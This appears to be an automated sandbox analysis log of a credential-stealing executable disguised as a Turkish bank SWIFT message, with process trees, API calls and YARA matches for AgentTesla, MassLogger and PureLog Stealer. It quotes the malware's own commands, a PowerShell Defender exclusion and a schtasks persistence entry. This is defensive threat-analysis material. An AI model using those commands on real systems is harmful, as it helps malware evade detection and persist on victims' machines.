Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000BB106 LogonUserW,

0_2_000BB106

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_00083D98 GetFullPathNameW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00083D98

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000C411C SendInput,keybd_event,

0_2_000C411C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000C74BB mouse_event,

0_2_000C74BB

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\server02.exe "C:\Users\user~1\AppData\Local\Temp\server02.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user~1\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\bothsided\spadixes.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\bothsided\spadixes.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_000BA66C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000C71FA

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, spadixes.exe	Binary or memory string: Shell_TrayWnd
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, spadixes.exe.0.dr, Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.34.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Code function: 13_2_00A320E1 cpuid

13_2_00A320E1

Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,		5_2_00417A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,		34_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server02.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\TrojanAI.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000A344A GetSystemTimeAsFileTime,__aulldiv,

0_2_000A344A

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_04BA8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,

5_2_04BA8550

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000B1E8E

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0009DDC0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected MassLogger RAT

Source: Yara match	File source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 5.2.svchost.exe.5800f16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8640000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7206478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.5800f16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.42.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.5e00f16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7206478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7205570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.5e00f16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600f08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00f08.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8260000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8260000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8640000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200f08.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600f08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8480000.41.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.72a8b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6fa8b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.72a8b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7205570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200f08.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8480000.40.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
